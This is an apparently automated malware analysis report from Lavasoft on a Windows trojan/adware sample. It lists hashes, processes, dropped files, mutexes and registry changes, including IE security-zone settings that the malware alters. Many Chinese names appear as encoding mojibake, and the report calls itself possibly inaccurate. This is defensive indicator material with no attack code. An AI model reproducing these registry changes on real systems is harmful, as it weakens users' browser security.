Gen.Variant.Adware.Graftor.167470_a6590134fc

by malwarelabrobot on April 12th, 2016 in Malware Descriptions.

Gen:Variant.Adware.Graftor.167470 (B) (Emsisoft), Gen:Variant.Adware.Graftor.167470 (AdAware), Backdoor.Win32.Farfli.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor, Worm, EmailWorm, Adware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: a6590134fc71addea0a3adac511f2071
SHA1: 2a56335dbee6673754e718854f279f9a18ab21c6
SHA256: b9f9e1d29939971aa038c5f5db14df9e7cbab3efdf4b6d2717ab2c497ceb1422
SSDeep: 12288:p wqYiMjW3Y6i2JfOeZgNeiRDE3gemnNR :QwqYna3d2eZgNeiRQ3ge0Y
Size: 474112 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2016-03-20 03:41:40
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour	Description
EmailWorm	Worm can send e-mails.

Process activity

The Trojan creates the following process(es):

taskkill.exe:1876
taskkill.exe:1492
taskkill.exe:1840
taskkill.exe:580
KuaiZip_Setup_union123_0088.exe:552
KZReport.exe:892
net1.exe:1484
ping.exe:468
KuaiZip.exe:856
net.exe:1864
regsvr32.exe:604
regsvr32.exe:1676
regsvr32.exe:628
regsvr32.exe:1460
LockPage.exe:1212
at.exe:1788
at.exe:496

The Trojan injects its code into the following process(es):

duba_u20862342_sv1_3_18.exe:632
%original file name%.exe:756
2345pic_k1252705.exe:1360

Mutexes

The following mutexes were created/opened:

WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
_!MSFTHISTORY!_
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
RasPbFile
ShimCacheMutex

File activity

The process KuaiZip_Setup_union123_0088.exe:552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\data\slimdata.dat (784 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\ErrorMsg.xml (196 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\readme.txt (1 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KZReport.exe (7523 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\Uninst.exe (8994 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\7zNew.dat (32 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\SetupHelper.exe (863 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KZMount2.exe (3478 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\reportframework.dll (7405 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\sfx\kzSetup_chs.sfx (5506 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\SLDefault.xml (196 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KZModule.dll (6778 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KZipShell.dll (3047 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\ali\kzshop.ico (1686 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\7z.dll (7131 bytes)
%Documents and Settings%\%current user%\Desktop\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹.lnk (661 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KZFormat.dll (2224 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\skin\disopt.skn (3635 bytes)
%System%\wbem\Logs\wbemprox.log (76 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\kuaizipUpdateChecker.dll (393 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\Mount.dll (1686 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\finderlib.dll (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KZ7ZData.7z.MD5 (33 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe (12581 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\KzNew.dat (74 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\ZipNew.dat (22 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\MountCore.dll (1059 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\my7zData.7z (38588 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\__-________.URL (49 bytes)
%Documents and Settings%\%current user%\Application Data\Kuaizip\report_config.txt (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KZ7ZData.7z (38588 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\DiskOpt.exe (4801 bytes)
%Documents and Settings%\%current user%\Start Menu\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹.lnk (661 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\UpdateChecker.exe (4527 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZipDrive.sys (1137 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KZTui.exe (4527 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\Update.exe (7758 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\DuiLib.dll (4801 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\ali\jp.png (392 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\lang\Chs_Lang.dll (1020 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\my7zData.7z (0 bytes)

The process KuaiZip.exe:856 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\wbem\Logs\wbemprox.log (76 bytes)
%Documents and Settings%\%current user%\Application Data\Kuaizip\report_config.txt (131 bytes)

The process %original file name%.exe:756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\js1[1] (623688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1OITCXMZ\bjzy3[1] (147925 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\js2[1] (664204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\js3[1] (672184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\6da25678gw1f1l5qvobehj20c80gbnpk[1].jpg (367545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\6da25678gw1f1l8xa7bhsj20c80gbu12[1].jpg (648672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\uc2[1] (947341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\uc3[1] (547626 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\6da25678gw1f1la7wjwlnj20c80gbnpj[1].jpg (787198 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\uc1[1] (911426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\6da25678gw1f1l8knvnatj20c80gbu12[1].jpg (680643 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Desktop\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹.lnk (0 bytes)

The process 2345pic_k1252705.exe:1360 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (39245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\RCWidgetPlugin.dll (36078 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\modern-header.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\FileInfo.dll (4992 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1.tmp (0 bytes)

The process LockPage.exe:1212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\System\safemonn32.dll (180 bytes)
%Program Files%\Common Files\System\config.dat (143 bytes)
%Program Files%\Common Files\System\safe.dat (3719 bytes)
%Program Files%\Common Files\System\OverlayIcon.dll (237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.dat (3719 bytes)
C:\unit.bat (103 bytes)

Registry activity

The process taskkill.exe:1876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 58 3C 46 AC 14 ED C7 61 3B B0 11 80 51 4E D3"

The process taskkill.exe:1492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E B4 8A 9F A5 04 F7 BA 1D E6 6E CE C2 75 FA A3"

The process taskkill.exe:1840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 9E 43 DA F3 46 11 CB 18 E1 CC F5 98 5F E3 F7"

The process taskkill.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 DD 96 53 8A 82 6F EE 5F B5 10 C7 2F 53 50 3B"

The process KuaiZip_Setup_union123_0088.exe:552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86]
"sfx" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"DisplayIcon" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\Uninst.exe"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹]
"ChannelID" = "union123_0088"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86]
"Mount.dll" = "0"

[HKCU\Software\SNDA]
"PCID" = "J630eda2537585b8645a6e7879b8a0d8b205ed5f8bb90ef1b5872e8e742772757"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86\lang]
"Chs_Lang.dll" = "0"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files]
"readme.txt" = "0"
"x86" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"InstallDate" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files]
"Ã¥Â¿Â«Ã¥Å½â€¹-Ã¥Å½â€¹Ã§Â¼Â©Ã¥â€™Å’Ã¨Â§Â£Ã¥Å½â€¹Ã§Â¼Â©Ã¥Ë†Â©Ã¥â„¢Â¨.URL" = "0"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86]
"KZReport.exe" = "KZReport"

[HKCU\Software\KuaiZip\Install]
"p_c" = "FA FD 39 AC 0B 9D 7B 13 49 92 B6 B2 3F 23 0B 0C"
"p_d" = "C5 2F 64 ED 43 DA 8B 17 D5 D8 81 BC 1C 20 80 76"

[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"SendEverBox" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCR\.zip\ShellNew]
"FileName" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\zipnew.dat"

[HKCU\Software\KuaiZip\Install]
"p_m" = "43 70 B4 95 6B E8 63 CA E7 DA 7A E0 7D 7F D0 53"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86]
"KZMount2.exe" = "0"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"DisplayName" = "Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86]
"DuiLib.dll" = "0"
"KuaiZip.exe" = "0"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"taskkill.exe" = "Kill Process"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\KuaiZip\Install]
"InstallCount" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\KuaiZip\Install]
"Version" = "2.8.14.2"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\skin]
"disopt.skn" = "0"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹]
"Version" = "2.8.14.2"

[HKCU\Software\KuaiZip\Install]
"md5" = "E4283218755BC37E5CA88875F91BE373"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\KuaiZip\Install]
"Path" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86]
"lang" = "0"

[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"AppendMenu" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files]
"data" = "0"

[HKCU\Software\KuaiZip\Report\offline\install]
"Code" = "0B 30 3D 16 08 58 73 AC 80 52 4A FE 81 44 4F 6F"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86]
"KZFormat.dll" = "0"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files]
"7zNew.dat" = "0"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86]
"kuaizipUpdateChecker.dll" = "0"
"update.exe" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 39 5A 69 51 B0 78 6E 94 8B EC 9F 93 B4 AD 45"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files]
"skin" = "0"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86]
"SetupHelper.exe" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86]
"KuaiZip.exe" = "KuaiZip Application"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86]
"reportframework.dll" = "0"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\ali]
"jp.png" = "0"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86]
"KuaiZipDrive.sys" = "0"

[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"StoreOnly" = "*.MPEG *.MPG *.DAT *.avi *.mov *.asf *.3gp *.mkv *.flv *.ra *.rm *.ram *.aiff *.au *.midi *.vqf *.ogg *.mid *.aac *.ape"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86]
"DiskOpt.exe" = "0"
"7z.dll" = "0"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files]
"SLDefault.xml" = "0"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86]
"finderlib.dll" = "0"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹]
"Path" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86]
"uninst.exe" = "0"

[HKCU\Software\KuaiZip\Install]
"InstallDate" = "160411"

[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"Name" = "Ãƒâ€˜Ã‚Â¹Ãƒâ€¹ÃƒÂµÃ‚Â²Ã‚Â¢ÃƒÆ’ÃƒÂ«Ã‚Â´Ã‚Â«Ã‚Â·Ãƒâ€“ÃƒÂÃƒÂÃ‚Â¸ÃƒÂ¸Ã‚ÂºÃƒÆ’Ãƒâ€œÃƒâ€˜"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"UninstallString" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\Uninst.exe"
"DisplayVersion" = "2.8.14.2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86]
"MountCore.dll" = "0"

[HKCR\.7z\ShellNew]
"FileName" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\7znew.dat"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"LastUpdateDate" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files]
"ali" = "0"
"KzNew.dat" = "0"

[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"ExeImmi" = "1"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86]
"KZipShell.dll" = "0"
"KZReport.exe" = "0"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"AT.exe" = "Schedule service command line interface"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files]
"ZipNew.dat" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\.kz\ShellNew]
"FileName" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\KzNew.dat"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86]
"KZModule.dll" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\KuaiZip\Install]
"qid" = "union123_0088"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86]
"UpdateChecker.exe" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\KuaiZip\Report]
"TimeStamp" = "1460397275"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86\sfx]
"kzSetup_chs.sfx" = "0"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\ali]
"kzshop.ico" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\X86]
"KZTui.exe" = "0"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files\data]
"slimdata.dat" = "0"

[HKCU\Software\KuaiZipSFX\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\Files]
"ErrorMsg.xml" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\KuaiZip\Report\offline\install]
"Path" = "72 34 FE 03 DC A6 9E A4 8F 09 CE 4E 34 23 3D 7F"

[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"Default" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"Publisher" = "Ã¤Â¸Å Ã¦ÂµÂ·Ã¥Â¹Â¿Ã¤Â¹ÂÃ§Â½â€˜Ã§Â»Å“Ã§Â§â€˜Ã¦Å â‚¬Ã¦Å“â€°Ã©â„¢ÂÃ¥â€¦Â¬Ã¥ÂÂ¸"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\KuaiZip]
[HKCU\Software\KuaiZip\Report]

The process KZReport.exe:892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 96 C7 88 67 41 F8 D9 01 9F B5 E4 54 F8 DC FF"

[HKCU\Software\KuaiZip\Report]
"OnlineLastDate" = "2016/04/11"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\KuaiZip\Report]
"LastQueryDate" = "2016/04/11"
"Desktop" = "2016/04/11"
"DefaultSoftTimestamp" = "1460397302"

The Trojan deletes the following registry key(s):

[HKCU\Software\KuaiZip\Report\offline\install]

The process net1.exe:1484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 83 7E DB DE 6E 05 34 0F 75 02 D6 7D 11 1A E9"

The process ping.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 23 FF D9 4D 1A F4 F9 16 97 39 5B 19 74 50 78"

The process duba_u20862342_sv1_3_18.exe:632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 2E 02 E3 93 B4 08 5F 4E C6 40 37 B6 4B 15 07"

The process KuaiZip.exe:856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\KuaiZip_FileAsso.Origin\.002]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.004]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.087]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.027]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 027 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.gz\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.004\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.039]
"(Default)" = "KuaiZip.039"

[HKCR\KuaiZip.081\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.074\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.061]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.013]
"set" = "1"

[HKCR\KuaiZip.025]
